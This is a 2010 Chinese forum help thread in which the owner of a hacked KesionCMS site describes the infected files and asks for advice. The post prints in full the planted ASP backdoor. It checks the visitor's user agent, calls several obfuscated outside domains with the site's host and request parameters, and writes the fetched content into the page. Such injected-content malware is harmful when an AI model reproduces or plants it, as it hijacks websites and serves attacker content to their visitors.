账号通
    

账号  

密码  

2058

查看

1

回复
主题:[求助]网站被挂马. [收藏主题]  
yizhe 当前离线

97

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:803 分
登录次数:48 次
注册时间:2006/10/29
最后登录:2010/9/26
yizhe 发表于:2010/9/26 19:16:00   | 只看该作者 查看该作者主题 楼主 
科汛在线网校系统
6.5 sp4最新版.

刚才ftp上面顺手删除了几个文件,名字是什么也记不得了.



  1. 在KS_Editor\images 里有个tablemodify****.gif这样的文件,50多K
  2. 首页 index.asp文件,下面加了不少的代码
  3. 现在只保存了一个文件,是建在根目录的。没在意,所以还没来得及删掉。代码如下:


<%

function getHTTPPage(url)

On Error Resume Next

dim http

set http=createobject("MSXML2.XMLHTTP")

Http.open "GET",url,false

Http.send()

if Http.readystate<>4 then

exit function

end if

getHTTPPage=BytesToBstr(Http.responseBody,"UTF-8")

'getHTTPPage=Http.responseBody

set http=nothing

if err.number<>0 then err.Clear

end function



Function Getlink()

On Error Resume Next

user_agent=Request.ServerVariables("HTTP_USER_AGENT")

If instr(user_agent,"yahoo")=0 then

    d=Request.ServerVariables("HTTP_HOST")

getPage=getHTTPPage("http://www.199888.cn/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"")



if instr(getPage,"2em")=0 then

getPage=getHTTPPage("http://www.1l1l11lll111l1lll11l1l1.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"")

end if

if instr(getPage,"2em")=0 then

getPage=getHTTPPage("http://www.lll1111l1l11l1l11ll11l.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"")

end if

if instr(getPage,"2em")=0 then

getPage=getHTTPPage("http://www.l1l11l1l1l11l1l1l1l1l11.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"")

end if

if instr(getPage,"2em")=0 then

getPage=getHTTPPage("http://www.1l1l11l1l11l11l1l1l1l1l1l.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"")

end if

if instr(getPage,"2em")=0 then

getPage=getHTTPPage("http://www.1l1l1l1llll1111l1ll111ll1.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"")

end if



    response.write getPage

    if err.number<>0 then err.Clear

End If

End Function

Call Getlink()

%>




刚才还ftp下来后,先是用系统的木马扫描,结果一个也没有扫到,只是提示有几个小图片有问题,但那几个图片是完全可以打开的,这几个当时没有删除,竟也没有扫描出来。



郁闷了。

前几天机器刚刚中过鬼影,恰好这些网站文件全部格掉了,完全没有备份...



先暂时删除了一些认为可疑的文件,可终究不知道它们是怎么来的...

老大们帮帮忙,给想想办法...



 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
ep165 当前离线

1593

主题

8

广播

5

粉丝
添加关注
级别:高一年

用户积分:5843 分
登录次数:311 次
注册时间:2008/12/22
最后登录:2017/11/17
ep165 发表于:2010/9/26 21:12:00   | 只看该作者 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.11000秒 powered by KesionCMS 9.0